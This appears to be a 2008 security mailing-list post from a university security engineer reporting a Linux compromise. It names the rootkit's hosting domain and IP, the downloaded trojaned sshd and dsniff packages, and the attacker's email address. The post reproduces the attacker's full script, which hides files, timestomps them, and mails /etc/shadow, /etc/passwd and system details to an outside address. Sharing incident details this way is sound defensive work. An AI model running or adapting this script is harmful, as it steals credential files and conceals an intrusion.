[nsp-sec] Yahoo email address catching password files - rootkit hosted at AS 21844

Daniel Adinolfi dra1 at postoffice9.mail.cornell.edu
Fri Oct 10 14:09:25 EDT 2008 

Folks,

We have a major incident here involving a number of linux hosts.  The  
script that gets run by the bad guys send the /etc/passwd and /etc/ 
shadow files (along with some other tidbits) to a particular yahoo.com  
email address.  It also installs a trojaned sshd and installs dsniff.

The email address in question is cc.cappy at yahoo.com.  Can someone at  
Yahoo please take down this address?

The root kit is available here:

webbuild.org

which is currently at 75.125.198.200.

AS      | IP               | AS Name
21844   | 75.125.198.200   | THEPLANET-AS - ThePlanet.com Internet  
Services, Inc.
PEER_AS | IP               | AS Name
2914    | 75.125.198.200   | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
3356    | 75.125.198.200   | LEVEL3 Level 3 Communications
3561    | 75.125.198.200   | SAVVIS - Savvis
4565    | 75.125.198.200   | MEGAPATH2-US - MegaPath Networks Inc.
6461    | 75.125.198.200   | MFNX MFN - Metromedia Fiber Network
7922    | 75.125.198.200   | DNEO-OSP3 - Comcast Cable Communications,  
Inc.

The following files are downloaded after the compromise, which we  
believe is through X-Windows.

WGET /.web/ssh.tgz
WGET /.web/sniff.tgz
WGET /.web/clean

ssh.tgz is a sshd replacement.  sniff.tgz is dsniff.

This is the script that was run to send the password and system info:
________________________

dir=`pwd`
mkdir /var/spool/.mail
mv snif2/* /var/spool/.mail
touch -acmr /usr/sbin/sshd /var/spool/.mail/*
cd /var/spool/.mail
./start

cd $dir
echo "[+]Sending root information"
echo "##########hostname##########" >> mail
hostname -f >> mail
hostname -i >> mail
echo "##########shadow list##########" >> mail
cat /etc/shadow >> mail
echo "##########passwd list##########" >> mail
cat /etc/passwd >>mail
echo "##########ifconfig##########" >> mail
/sbin/ifconfig | grep inet >> mail
echo "##########kernel type##########" >> mail
uname -a >> mail
echo "Os system" >> mail
cat /etc/issue >> mail
echo "sending mail"
mail cc.cappy at yahoo.com -s "$(hostname -f)" < mail
cd ..
rm -rf sniff
rm -rf sniff.tgz

___________________________

If folks would like more info, please feel free to contact me directly.

Thanks.

-Dan


_________________
Daniel Adinolfi, CISSP
Senior Security Engineer, IT Security Office
Cornell University - Office of Information Technologies
email: dra1 at cornell.edu   phone: 607-255-7657

More information about the nsp-security mailing list